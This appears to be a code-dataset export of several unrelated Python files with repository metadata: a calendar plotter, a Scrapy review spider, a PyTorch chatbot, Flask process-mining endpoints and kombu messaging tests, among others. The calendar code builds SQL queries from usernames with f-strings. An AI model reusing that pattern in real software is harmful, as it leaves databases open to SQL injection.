def write_xml(self, file_path):
# type: (str) -> None
"""
This function will overwrite existing files
Args:
file_path (str): Path to the file to write to
"""
xml_dom, _ = self._check_existing(file_path)
veh_dist_nodes = [dist.create_veh_dist(xml_dom=xml_dom) for dist in self.distributions]
write_additional_minidom(xml_dom, veh_dist_nodes, file_path=file_path)
| ngctnnnn/DRL_Traffic-Signal-Control | sumo-rl/sumo/tools/sumolib/vehicletype.py | vehicletype.py | py | 12,625 | python | en | code | 17 | github-code | 6 | [
{
"api_name": "random.normalvariate",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "random.lognormvariate",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "random.normalvariate",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "rando... |
314473279 |
import os
from util.IO import IO
from util.Event import Event
import matplotlib.pyplot as plt
from matplotlib import rc
import numpy as np
from datetime import date, timedelta, datetime
import pandas as pd
class Calendar:
def __init__(self, username):
self.usernames = username
io = IO(self.usernames)
self.mysql = io.dbConnect()
def plotEvents(self, today, defaultUserName=None):
'''
defaultUserName : the current user
'''
otherEvents = []
if defaultUserName != None:
query = f"""
SELECT *
FROM REQUESTS
WHERE Requestor != '{defaultUserName}'
"""
reqTable = pd.read_sql(query, self.mysql)
for ii, row in reqTable.iterrows():
event = Event(row['Requestor'], row['EventName'], row['StartTime'], row['EndTime'], row['StartDate'])
otherEvents.append(event)
colors = ['firebrick', 'dodgerblue', 'seagreen']
colorIdx = 0
#raise ValueError('made it')
fig, axs = plt.subplots(1, 7, figsize=(30, 15))
# get new ioObj
io = IO(self.usernames)
# generate list of next 7 days
datesList = [today + timedelta(days=i) for i in range(7)]
# generate plot of the users schedule for the next 7 days
strTimes = [f"{ii}:00" for ii in range(24)]
axs[0].set_ylabel('Time [hh:mm]', fontsize=30)
x = [0, 1]
placeTicks = True
for ax, dd in zip(axs, datesList):
ax.set_title(dd.strftime("%m/%d"), fontsize=24)
ax.set_xticks([])
ax.set_yticks([])
ax.set_ylim(24)
for jj in range(24):
ax.axhline(jj, x[0], x[1], ls='--', color='k', alpha=0.5)
for event in io.events:
if event.startTime.strftime("%m/%d") == dd.strftime("%m/%d"):
startHr = int(event.startTime.strftime("%H"))
startMin = int(event.startTime.strftime("%M"))
endHr = int(event.endTime.strftime("%H"))
endMin = int(event.endTime.strftime("%M"))
ax.fill_between(x, startHr + startMin/60, endHr + endMin/60, color=colors[0], alpha=0.5)
midpoint = (startHr + startMin/60 + endHr + endMin/60)/2
ax.text(0, midpoint, event.eventName, color='w', fontsize=24)
for event in otherEvents:
if event.startTime.strftime("%m/%d") == dd.strftime("%m/%d"):
startHr = int(event.startTime.strftime("%H"))
startMin = int(event.startTime.strftime("%M"))
endHr = int(event.endTime.strftime("%H"))
endMin = int(event.endTime.strftime("%M"))
ax.fill_between(x, startHr + startMin/60, endHr + endMin/60, color=colors[1], alpha=0.5)
midpoint = (startHr + startMin/60 + endHr + endMin/60)/2
ax.text(0, midpoint, event.eventName, color='w', fontsize=24)
cursor = self.mysql.cursor()
# get other User name
getNames = f"""
SELECT *
FROM USERNAME
WHERE UserName='{event.userName}'
"""
userInfo = pd.read_sql(getNames, self.mysql)
first = userInfo['FirstName'].tolist()[0]
last = userInfo['LastName'].tolist()[0]
ax.text(0, midpoint+1, first+" "+last, color='w', fontsize=24)
if placeTicks:
ax.set_yticks(np.arange(len(strTimes)), labels=strTimes, fontsize=24)
placeTicks=False
else:
ax.set_yticks(np.arange(len(strTimes)), labels="", fontsize=24)
fig.suptitle("Year: " + datesList[0].strftime("%Y"), fontsize=36)
return fig
| noahfranz13/IOU | util/Calendar.py | Calendar.py | py | 4,071 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "util.IO.IO",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pandas.read_sql",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "util.Event.Event",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplot... |
36108675828 | from calendar import weekday
import os
import zipfile
import numpy as np
import torch
import sklearn.metrics as metrics
import matplotlib.pyplot as plt
# if dataset == "alpha":
# if (not os.path.isfile("DC_STGCN/data/adj_mat_alpha.npy")
# or not os.path.isfile("DC_STGCN/data/node_values_alpha.npy")):
with zipfile.ZipFile("DC_STGCN/data/SCATS_alpha.zip", 'r') as zip_ref:
zip_ref.extractall("DC_STGCN/data/")
X_alpha = np.load("DC_STGCN/data/alpha_data/node_values_alpha.npy").transpose((1, 2, 0))
X_alpha = X_alpha.astype(np.float32)
# elif dataset == "bravo":
# if (not os.path.isfile("DC_STGCN/data/adj_mat_bravo.npy")
# or not os.path.isfile("DC_STGCN/data/node_values_bravo.npy")):
with zipfile.ZipFile("DC_STGCN/data/SCATS_bravo.zip", 'r') as zip_ref:
zip_ref.extractall("DC_STGCN/data/")
# A = np.load("DC_STGCN/data/bravo_data/adj_mat_bravo.npy")
# A = A.astype(np.float32)
X_bravo = np.load("DC_STGCN/data/bravo_data/node_values_bravo.npy").transpose((1, 2, 0))
X_bravo = X_bravo.astype(np.float32)
print(X_alpha.shape)
print(X_bravo.shape)
X_196 = X_alpha[2:5, :, :]
print(X_196.shape)
X_bravoplus = np.concatenate((X_bravo, X_196), axis=0)
print(X_bravoplus.shape)
X_bravoplus = X_bravoplus.transpose((2, 0, 1))
np.save("interpret_csv_bravoplus/node_values_bravoplus", X_bravoplus)
files_string = "TO BE CONFIGURED"
f = open("interpret_csv_bravoplus/nv_info.txt", "w")
info_string = "Num Juncs:\t" + str(X_bravoplus.shape[1]) + "\nNum Channels:\t" + str(X_bravoplus.shape[2]) + "\nNum Days:\t" + str(X_bravoplus.shape[0]/480)
print(info_string)
f.write(info_string)
f.write(files_string)
f.close()
if os.path.isfile("interpret_csv_bravoplus/adj_mat_bravoplus.npy") and os.path.isfile("interpret_csv_bravoplus/adj_info.txt"):
with zipfile.ZipFile("interpret_csv_bravoplus/SCATS_bravoplus.zip", "w") as zip_object:
zip_object.write("interpret_csv_bravoplus/node_values_bravoplus.npy", arcname="bravoplus_data/node_values_bravoplus.npy")
zip_object.write("interpret_csv_bravoplus/adj_mat_bravoplus.npy", arcname="bravoplus_data/adj_mat_bravoplus.npy")
zip_object.write("interpret_csv_bravoplus/adj_info.txt", arcname="bravoplus_data/adj_info.npy")
zip_object.write("interpret_csv_bravoplus/nv_info.txt", arcname="bravoplus_data/nv_info.npy")
print("Zipped") | oscarcrowley1/thesis | interpret_csv_bravoplus/make_bravoplus_tensor.py | make_bravoplus_tensor.py | py | 2,378 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "zipfile.ZipFile",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "zipfile.ZipFile",
"... |
38902490932 | import scrapy
from sanic.log import logger
reviews_tag_identifier = "//span[@data-hook='review-body']/span/text()"
next_page_tag_identifier = "//li[@class='a-last']/a/@href"
class AmazonSpider(scrapy.Spider):
name = 'amazon_spider'
allowed_domains = ['amazon.in']
def __init__(self, name=None, uid=None, asin=None):
super().__init__(name)
if not asin:
logger.warning('| amazon spider | asin param was null - it should not be null')
raise Exception('asin should not be null')
self.asin = asin
self.uid = uid
self.start_urls = [
f'https://www.amazon.in/product-reviews/{asin}'
]
self.reviews = []
self.base_url = 'https://www.google.com'
def parse(self, response, **kwargs):
logger.info('| amazon spider | started parsing the reviews')
reviews_dom = response.xpath(reviews_tag_identifier)
if reviews_dom:
for review in reviews_dom:
self.reviews.append(
review.get()
)
else:
logger.warning('| amazon spider | No reviews element in the html page')
next_page = response.xpath(next_page_tag_identifier).get()
if next_page:
yield scrapy.Request(
response.urljoin(next_page), self.parse
)
else:
yield {
'meta-data': {
'uid': self.uid,
'asin': self.asin,
'is_preprocessed': False,
'total_reviews': len(self.reviews),
},
'reviews': self.reviews
}
| Mahi-developer/review-analyzer | app/scrapper/spiders/amazon_spider.py | amazon_spider.py | py | 1,683 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "scrapy.Spider",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sanic.log.logger.warning",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sanic.log.logger",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "sanic.log... |
27661384502 | import torch
import torch.nn as nn
import torch.nn.functional as F
import random
from base import BaseModel
class Encoder(nn.Module):
def __init__(self, embedding, hidden_size, rnn_cell='GRU', bidirectional=False, n_layers=1, dropout=0.0, device='cpu'):
super(Encoder, self).__init__()
self.hidden_size = hidden_size
self.rnn_cell = rnn_cell
#self.padding_idx = self.embedding.to_index(padding)
self.bidirectional = bidirectional
self.n_layers = n_layers
self.dropout = dropout
self.device = device
self.n_init = (2 if bidirectional == True else 1) * n_layers
self.vocab_size = embedding.vocab_size
self.emb_size = embedding.emb_size
self.embedding = nn.Embedding(self.vocab_size, self.emb_size)
#self.embedding.weight = nn.Parameter(embedding.vectors)
if rnn_cell == 'GRU': self.rnn = nn.GRU(self.emb_size, self.hidden_size, batch_first=True, dropout=self.dropout, num_layers=self.n_layers)
#self.freeze_embedding()
def freeze_embedding(self):
for param in self.embedding.parameters():
param.requires_grad = False
def forward(self, source):
# source: (batch, seq_len)
#init_hidden = torch.randn(self.n_init, source.size(0), self.hidden_size).to(self.device) #(n_layer*n_direction, batch, hidden_size)
source = self.embedding(source) # (batch, seq_len) -> (batch, seq_len, emb_size)
output, hidden = self.rnn(source, None) #(batch, seq_len, emb_size) -> (batch, seq_len, emb_size*n_direction), (n_layer*n_direction, batch, hidden_size)
return output, hidden #(n_layer*n_direction, batch, hidden_size)
class Decoder(nn.Module):
def __init__(self, embedding, hidden_size, rnn_cell='GRU', bidirectional=False, n_layers=1, dropout=0.2, device='cpu', teaching_force_rate=0.0, use_attn=False, method=None, padded_len=None):
super(Decoder, self).__init__()
self.hidden_size = hidden_size
self.rnn_cell = rnn_cell
self.bidirectional = bidirectional
self.n_layers = n_layers
self.dropout = dropout
self.device = device
self.n_init = (2 if bidirectional == True else 1) * n_layers
self.teaching_force_rate = teaching_force_rate
self.vocab_size = embedding.vocab_size
self.emb_size = embedding.emb_size
self.use_attn = use_attn
self.step = 0
self.relu = nn.ReLU()
self.softmax = nn.LogSoftmax(dim=-1)
self.embedding_org = embedding
self.embedding = nn.Embedding(self.vocab_size, self.emb_size)
#self.embedding.weight = nn.Parameter(embedding.vectors)
self.linear = nn.Linear(self.hidden_size, self.vocab_size)
if rnn_cell == 'GRU': self.rnn = nn.GRU(self.emb_size, self.hidden_size, batch_first=True, dropout=self.dropout, num_layers=self.n_layers)
if self.use_attn:
self.attn = Attention(hidden_size=self.hidden_size, method=method, padded_len=padded_len)
#self.freeze_embedding()
def freeze_embedding(self):
for param in self.embedding.parameters():
param.requires_grad = False
def forward(self, label, init_hidden, encoder_output=None):
if(self.step > 2000): self.teaching_force_rate = 0.2
self.step += 1
use_teaching_force = True if random.random() <= self.teaching_force_rate else False
# source: (batch, seq_len)
#input = self.relu(self.embedding(input)) # (batch, seq_len) -> (batch, seq_len, emb_size)
batch, seq_len = label.size(0), label.size(1)
outputs = []
hidden = init_hidden
if use_teaching_force:
for i in range(seq_len):
input = label[:, i].unsqueeze(1)
#print(label)
#print(str(i) + ': ' + self.embedding_org.indice_to_sentence(label[0].tolist()))
input = self.relu(self.embedding(input))
if self.use_attn:
attn_output = self.attn(encoder_output, input, hidden)
output, hidden = self.rnn(attn_output, hidden)
else:
output, hidden = self.rnn(input, hidden)
output = self.softmax(self.linear(output))
last_predict = output.max(2)[1]
#print(str(i) + ': ' + self.embedding_org.indice_to_sentence(last_predict[0].tolist()))
outputs.append(output)
else:
input = label[:, 0].unsqueeze(1)
input = self.relu(self.embedding(input))
for i in range(seq_len):
if self.use_attn:
attn_output = self.attn(encoder_output, input, hidden)
output, hidden = self.rnn(attn_output, hidden)
else:
output, hidden = self.rnn(input, hidden)
output = self.softmax(self.linear(output))
outputs.append(output)
last_predict = output.max(2)[1]
input = self.relu(self.embedding(last_predict))
outputs = torch.cat(outputs, dim=1)
return outputs
class Attention(nn.Module):
def __init__(self, hidden_size, method, padded_len):
super(Attention, self).__init__()
self.hidden_size = hidden_size
self.method = method
self.attn = nn.Linear(hidden_size*2, padded_len)
self.attn_combine = nn.Linear(hidden_size*2, hidden_size)
self.softmax = nn.Softmax()
self.relu = nn.ReLU()
def forward(self, encoder_output, decoder_input_embeded, decoder_hidden):
# encoder_output: [batch, seq_len, hidden_size=embedded_size]
# decoder_input_embeded: [batch, 1, embedded_size]
# decoder_hidden: [batch, 1, embedded_size]
decoder_hidden = decoder_hidden.permute(1, 0, 2)
# print(encoder_output.size())
# print(decoder_input_embeded.size())
# print(decoder_hidden.size())
similarity = self.attn(torch.cat((decoder_input_embeded, decoder_hidden), dim=-1))
attn_weight = self.softmax(similarity) # [batch, 1, padded_len]
attn_applied = torch.bmm(attn_weight, encoder_output) #[batch, 1, hidden_size]
output = self.relu(self.attn_combine(torch.cat((attn_applied, decoder_input_embeded), dim=-1)))
return output
class ChatBotModel(BaseModel):
def __init__(self, embedding, hidden_size, rnn_cell='GRU', bidirectional=False, n_layers=1, dropout=0.2, device='cpu', teaching_force_rate=0.0, use_attn=False, method='concat', padded_len=10):
super().__init__()
self.use_attn = use_attn
self.embedding = embedding
if self.use_attn:
self.hidden_size = embedding.emb_size
else:
self.hidden_size = hidden_size
self.encoder = Encoder(self.embedding, self.hidden_size, rnn_cell=rnn_cell, bidirectional=bidirectional, n_layers=n_layers, dropout=dropout, device=device)
self.decoder = Decoder(self.embedding, self.hidden_size, rnn_cell=rnn_cell, bidirectional=bidirectional, n_layers=n_layers, dropout=dropout, device=device, teaching_force_rate=teaching_force_rate, use_attn=self.use_attn, method=method, padded_len=padded_len)
def forward(self, source, target):
# print('> : ' + self.embedding.indice_to_sentence(source[0].tolist()))
# print('= : ' + self.embedding.indice_to_sentence(target[0].tolist()))
encoder_output, encoder_hidden = self.encoder(source)
if self.use_attn:
output = self.decoder(target, encoder_hidden, encoder_output)
else:
output = self.decoder(target, encoder_hidden)
return output
| vincent861223/ChatBot | model/model.py | model.py | py | 7,730 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "torch.nn.Module",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "torch.nn.Embedding",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_n... |
2534597571 | import copy
import json
import os
import time
from flask import Blueprint, request, Response
import pm4py
from pm4py.algo.filtering.log.attributes import attributes_filter
from pm4py.objects.conversion.process_tree.converter import to_petri_net_transition_bordered as converter
from pm4py.visualization.common.utils import get_base64_from_gviz
from KPIAlgebras.entities import data
from KPIAlgebras.entities import model as model_object
from KPIAlgebras.request_objects import request_objects
from KPIAlgebras.response_objects import response_objects
from KPIAlgebras.serializers import extended_process_tree_serializer as serializer
from KPIAlgebras.use_cases import alignment_computation_use_case as alignment
from KPIAlgebras.use_cases import cycle_time_analysis_use_case as measurement_high_level
from KPIAlgebras.use_cases import decorate_extended_process_tree_use_case as decorate_tree
from KPIAlgebras.use_cases import import_event_log_use_case as import_log
from KPIAlgebras.use_cases import time_range_construction_use_case as measurement_fine_grained
from KPIAlgebras.util import constants, http_response_status_code
blueprint = Blueprint('endpoints', __name__)
alignments = None
log = None
model = None
initial_marking = None
final_marking = None
extended_process_tree = None
@blueprint.route('/measurement', methods=['POST'])
def measurement():
print("Begining the fine grained analysis")
t1 = time.perf_counter()
parameters = dict()
log_file = request.files['eventLog']
log_file.save(os.path.join(constants.upload_folder, log_file.filename))
model_file = request.files['model']
model_file.save(os.path.join(constants.upload_folder, model_file.filename))
import_log_use_case = import_log.ImportEventLogUseCase()
request_object = request_objects.TimeRangeConstructionRequestObject.from_dict({'event_log': log_file.filename})
global log
log = data.EventLog(import_log_use_case.import_event_log_from_xes(request_object))
os.remove(os.path.join(constants.upload_folder, log_file.filename))
process_tree = pm4py.read_ptml(os.path.join(constants.upload_folder, model_file.filename))
os.remove(os.path.join(constants.upload_folder, model_file.filename))
global extended_process_tree
extended_process_tree = model_object.ExtendedProcessTree(process_tree)
global model, initial_marking, final_marking
model, initial_marking, final_marking = converter.apply(extended_process_tree)
alignment_use_case = alignment.AlignmentComputationUseCase()
global alignments
alignments = alignment_use_case.compute(model, initial_marking, final_marking, log)
high_level_use_case = measurement_high_level.CycleTimeAnalysisUseCase()
response = high_level_use_case.analyse(log.log, alignments, extended_process_tree, model)
extended_process_tree = response.value
lifecycle = attributes_filter.get_attribute_values(log.log, "lifecycle:transition")
if lifecycle is not None and 'start' in lifecycle:
fine_grained_use_case = measurement_fine_grained.TimeRangesConstructionUseCase(log, extended_process_tree,
model, initial_marking,
final_marking, alignments)
response = fine_grained_use_case.construct_time_ranges(log.log, alignments, model, initial_marking,
final_marking)
decoration_use_case = decorate_tree.DecorateExtendedProcessTreeUseCase()
gviz = decoration_use_case.decorate(extended_process_tree)
svg = get_base64_from_gviz(gviz)
extended_process_tree_json = json.dumps(response.value, cls=serializer.ExtendedProcessTreeJsonEncoder)
json_dict = json.loads(extended_process_tree_json)
json_dict["svg"] = svg.decode('utf-8')
extended_process_tree_json = json.dumps(json_dict, cls=serializer.ExtendedProcessTreeJsonEncoder)
t2 = time.perf_counter()
print(t2 - t1)
return Response(extended_process_tree_json, mimetype='application/json',
status=http_response_status_code.STATUS_CODES[response.type])
@blueprint.route('/timeshifting', methods=['POST'])
def timeshifting():
parameters = request.get_json()
if parameters is None:
parameters = dict()
for arg, value in request.args.items():
parameters[arg] = value
request_object = request_objects.TimeShiftingRequestObject.from_dict(parameters)
global log, model, initial_marking, final_marking, extended_process_tree, alignments
extended_process_tree.states.append(copy.deepcopy(extended_process_tree))
fine_grained_use_case = measurement_fine_grained.TimeRangesConstructionUseCase(log.log, extended_process_tree,
model, initial_marking,
final_marking, alignments)
response = fine_grained_use_case.shift_time_ranges(request_object)
decoration_use_case = decorate_tree.DecorateExtendedProcessTreeUseCase()
gviz = decoration_use_case.decorate(extended_process_tree)
svg = get_base64_from_gviz(gviz)
extended_process_tree_json = json.dumps(response.value, cls=serializer.ExtendedProcessTreeJsonEncoder)
json_dict = json.loads(extended_process_tree_json)
json_dict["svg"] = svg.decode('utf-8')
extended_process_tree_json = json.dumps(json_dict, cls=serializer.ExtendedProcessTreeJsonEncoder)
return Response(extended_process_tree_json, mimetype='application/json',
status=http_response_status_code.STATUS_CODES[response.type])
@blueprint.route('/undoChange', methods=['GET'])
def undo_change():
global extended_process_tree
extended_process_tree = extended_process_tree.states.pop()
decoration_use_case = decorate_tree.DecorateExtendedProcessTreeUseCase()
gviz = decoration_use_case.decorate(extended_process_tree)
svg = get_base64_from_gviz(gviz)
extended_process_tree_json = json.dumps(extended_process_tree, cls=serializer.ExtendedProcessTreeJsonEncoder)
json_dict = json.loads(extended_process_tree_json)
json_dict["svg"] = svg.decode('utf-8')
extended_process_tree_json = json.dumps(json_dict, cls=serializer.ExtendedProcessTreeJsonEncoder)
return Response(extended_process_tree_json, mimetype='application/json',
status=http_response_status_code.STATUS_CODES[response_objects.ResponseSuccess.SUCCESS])
@blueprint.route('/undoAllChanges', methods=['GET'])
def undo_all_changes():
global extended_process_tree
extended_process_tree = extended_process_tree.states[0]
decoration_use_case = decorate_tree.DecorateExtendedProcessTreeUseCase()
gviz = decoration_use_case.decorate(extended_process_tree)
svg = get_base64_from_gviz(gviz)
extended_process_tree_json = json.dumps(extended_process_tree, cls=serializer.ExtendedProcessTreeJsonEncoder)
json_dict = json.loads(extended_process_tree_json)
json_dict["svg"] = svg.decode('utf-8')
extended_process_tree_json = json.dumps(json_dict, cls=serializer.ExtendedProcessTreeJsonEncoder)
return Response(extended_process_tree_json, mimetype='application/json',
status=http_response_status_code.STATUS_CODES[response_objects.ResponseSuccess.SUCCESS])
| luisfsts/KPIAlgebras | KPIAlgebras/rest/endpoints.py | endpoints.py | py | 7,463 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Blueprint",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "time.perf_counter",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "flask.request.files",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "flask.requ... |
18699671015 | from django.urls import path
from posting.views import (
PostingView,
CategoryView,
PostingLikeView,
PostingScrapView
)
urlpatterns = [
path('', PostingView.as_view()),
path('/category', CategoryView.as_view()),
path('/like', PostingLikeView.as_view()),
path('/scrap', PostingScrapView.as_view())
]
| wecode-bootcamp-korea/17-1st-SweetHome-backend | posting/urls.py | urls.py | py | 336 | python | en | code | 3 | github-code | 6 | [
{
"api_name": "django.urls.path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "posting.views.PostingView.as_view",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "posting.views.PostingView",
"line_number": 11,
"usage_type": "name"
},
{
"api_... |
8267902176 | from __future__ import annotations
import pickle
import sys
from collections import defaultdict
from unittest.mock import Mock, patch
import pytest
from kombu import Connection, Consumer, Exchange, Producer, Queue
from kombu.exceptions import MessageStateError
from kombu.utils import json
from kombu.utils.functional import ChannelPromise
from t.mocks import Transport
class test_Producer:
def setup(self):
self.exchange = Exchange('foo', 'direct')
self.connection = Connection(transport=Transport)
self.connection.connect()
assert self.connection.connection.connected
assert not self.exchange.is_bound
def test_repr(self):
p = Producer(self.connection)
assert repr(p)
def test_pickle(self):
chan = Mock()
producer = Producer(chan, serializer='pickle')
p2 = pickle.loads(pickle.dumps(producer))
assert p2.serializer == producer.serializer
def test_no_channel(self):
p = Producer(None)
assert not p._channel
@patch('kombu.messaging.maybe_declare')
def test_maybe_declare(self, maybe_declare):
p = self.connection.Producer()
q = Queue('foo')
p.maybe_declare(q)
maybe_declare.assert_called_with(q, p.channel, False)
@patch('kombu.common.maybe_declare')
def test_maybe_declare_when_entity_false(self, maybe_declare):
p = self.connection.Producer()
p.maybe_declare(None)
maybe_declare.assert_not_called()
def test_auto_declare(self):
channel = self.connection.channel()
p = Producer(channel, self.exchange, auto_declare=True)
# creates Exchange clone at bind
assert p.exchange is not self.exchange
assert p.exchange.is_bound
# auto_declare declares exchange'
assert 'exchange_declare' not in channel
p.publish('foo')
assert 'exchange_declare' in channel
def test_manual_declare(self):
channel = self.connection.channel()
p = Producer(channel, self.exchange, auto_declare=False)
assert p.exchange.is_bound
# auto_declare=False does not declare exchange
assert 'exchange_declare' not in channel
# p.declare() declares exchange')
p.declare()
assert 'exchange_declare' in channel
def test_prepare(self):
message = {'the quick brown fox': 'jumps over the lazy dog'}
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
m, ctype, cencoding = p._prepare(message, headers={})
assert json.loads(m) == message
assert ctype == 'application/json'
assert cencoding == 'utf-8'
def test_prepare_compression(self):
message = {'the quick brown fox': 'jumps over the lazy dog'}
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
headers = {}
m, ctype, cencoding = p._prepare(message, compression='zlib',
headers=headers)
assert ctype == 'application/json'
assert cencoding == 'utf-8'
assert headers['compression'] == 'application/x-gzip'
import zlib
assert json.loads(zlib.decompress(m).decode('utf-8')) == message
def test_prepare_custom_content_type(self):
message = b'the quick brown fox'
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
m, ctype, cencoding = p._prepare(message, content_type='custom')
assert m == message
assert ctype == 'custom'
assert cencoding == 'binary'
m, ctype, cencoding = p._prepare(message, content_type='custom',
content_encoding='alien')
assert m == message
assert ctype == 'custom'
assert cencoding == 'alien'
def test_prepare_is_already_unicode(self):
message = 'the quick brown fox'
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
m, ctype, cencoding = p._prepare(message, content_type='text/plain')
assert m == message.encode('utf-8')
assert ctype == 'text/plain'
assert cencoding == 'utf-8'
m, ctype, cencoding = p._prepare(message, content_type='text/plain',
content_encoding='utf-8')
assert m == message.encode('utf-8')
assert ctype == 'text/plain'
assert cencoding == 'utf-8'
def test_publish_with_Exchange_instance(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
p.publish('hello', exchange=Exchange('foo'), delivery_mode='transient')
assert p._channel.basic_publish.call_args[1]['exchange'] == 'foo'
def test_publish_with_expiration(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
p.publish('hello', exchange=Exchange('foo'), expiration=10)
properties = p._channel.prepare_message.call_args[0][5]
assert properties['expiration'] == '10000'
def test_publish_with_timeout(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
p.publish('test_timeout', exchange=Exchange('foo'), timeout=1)
timeout = p._channel.basic_publish.call_args[1]['timeout']
assert timeout == 1
def test_publish_with_reply_to(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
assert not p.exchange.name
p.publish('hello', exchange=Exchange('foo'), reply_to=Queue('foo'))
properties = p._channel.prepare_message.call_args[0][5]
assert properties['reply_to'] == 'foo'
def test_set_on_return(self):
chan = Mock()
chan.events = defaultdict(Mock)
p = Producer(ChannelPromise(lambda: chan), on_return='on_return')
p.channel
chan.events['basic_return'].add.assert_called_with('on_return')
def test_publish_retry_calls_ensure(self):
p = Producer(Mock())
p._connection = Mock()
p._connection.declared_entities = set()
ensure = p.connection.ensure = Mock()
p.publish('foo', exchange='foo', retry=True)
ensure.assert_called()
def test_publish_retry_with_declare(self):
p = self.connection.Producer()
p.maybe_declare = Mock()
p.connection.ensure = Mock()
ex = Exchange('foo')
p._publish('hello', 0, '', '', {}, {}, 'rk', 0, 0, ex, declare=[ex])
p.maybe_declare.assert_called_with(ex)
def test_revive_when_channel_is_connection(self):
p = self.connection.Producer()
p.exchange = Mock()
new_conn = Connection('memory://')
defchan = new_conn.default_channel
p.revive(new_conn)
assert p.channel is defchan
p.exchange.revive.assert_called_with(defchan)
def test_enter_exit(self):
p = self.connection.Producer()
p.release = Mock()
with p as x:
assert x is p
p.release.assert_called_with()
def test_connection_property_handles_AttributeError(self):
p = self.connection.Producer()
p.channel = object()
p.__connection__ = None
assert p.connection is None
def test_publish(self):
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
message = {'the quick brown fox': 'jumps over the lazy dog'}
ret = p.publish(message, routing_key='process')
assert 'prepare_message' in channel
assert 'basic_publish' in channel
m, exc, rkey = ret
assert json.loads(m['body']) == message
assert m['content_type'] == 'application/json'
assert m['content_encoding'] == 'utf-8'
assert m['priority'] == 0
assert m['properties']['delivery_mode'] == 2
assert exc == p.exchange.name
assert rkey == 'process'
def test_no_exchange(self):
chan = self.connection.channel()
p = Producer(chan)
assert not p.exchange.name
def test_revive(self):
chan = self.connection.channel()
p = Producer(chan)
chan2 = self.connection.channel()
p.revive(chan2)
assert p.channel is chan2
assert p.exchange.channel is chan2
def test_on_return(self):
chan = self.connection.channel()
def on_return(exception, exchange, routing_key, message):
pass
p = Producer(chan, on_return=on_return)
assert on_return in chan.events['basic_return']
assert p.on_return
class test_Consumer:
def setup(self):
self.connection = Connection(transport=Transport)
self.connection.connect()
assert self.connection.connection.connected
self.exchange = Exchange('foo', 'direct')
def test_accept(self):
a = Consumer(self.connection)
assert a.accept is None
b = Consumer(self.connection, accept=['json', 'pickle'])
assert b.accept == {
'application/json', 'application/x-python-serialize',
}
c = Consumer(self.connection, accept=b.accept)
assert b.accept == c.accept
def test_enter_exit_cancel_raises(self):
c = Consumer(self.connection)
c.cancel = Mock(name='Consumer.cancel')
c.cancel.side_effect = KeyError('foo')
with c:
pass
c.cancel.assert_called_with()
def test_enter_exit_cancel_not_called_on_connection_error(self):
c = Consumer(self.connection)
c.cancel = Mock(name='Consumer.cancel')
assert self.connection.connection_errors
with pytest.raises(self.connection.connection_errors[0]):
with c:
raise self.connection.connection_errors[0]()
c.cancel.assert_not_called()
def test_receive_callback_accept(self):
message = Mock(name='Message')
message.errors = []
callback = Mock(name='on_message')
c = Consumer(self.connection, accept=['json'], on_message=callback)
c.on_decode_error = None
c.channel = Mock(name='channel')
c.channel.message_to_python = None
c._receive_callback(message)
callback.assert_called_with(message)
assert message.accept == c.accept
def test_accept__content_disallowed(self):
conn = Connection('memory://')
q = Queue('foo', exchange=self.exchange)
p = conn.Producer()
p.publish(
{'complex': object()},
declare=[q], exchange=self.exchange, serializer='pickle',
)
callback = Mock(name='callback')
with conn.Consumer(queues=[q], callbacks=[callback]) as consumer:
with pytest.raises(consumer.ContentDisallowed):
conn.drain_events(timeout=1)
callback.assert_not_called()
def test_accept__content_allowed(self):
conn = Connection('memory://')
q = Queue('foo', exchange=self.exchange)
p = conn.Producer()
p.publish(
{'complex': object()},
declare=[q], exchange=self.exchange, serializer='pickle',
)
callback = Mock(name='callback')
with conn.Consumer(queues=[q], accept=['pickle'],
callbacks=[callback]):
conn.drain_events(timeout=1)
callback.assert_called()
body, message = callback.call_args[0]
assert body['complex']
def test_set_no_channel(self):
c = Consumer(None)
assert c.channel is None
c.revive(Mock())
assert c.channel
def test_set_no_ack(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True, no_ack=True)
assert consumer.no_ack
def test_add_queue_when_auto_declare(self):
consumer = self.connection.Consumer(auto_declare=True)
q = Mock()
q.return_value = q
consumer.add_queue(q)
assert q in consumer.queues
q.declare.assert_called_with()
def test_add_queue_when_not_auto_declare(self):
consumer = self.connection.Consumer(auto_declare=False)
q = Mock()
q.return_value = q
consumer.add_queue(q)
assert q in consumer.queues
assert not q.declare.call_count
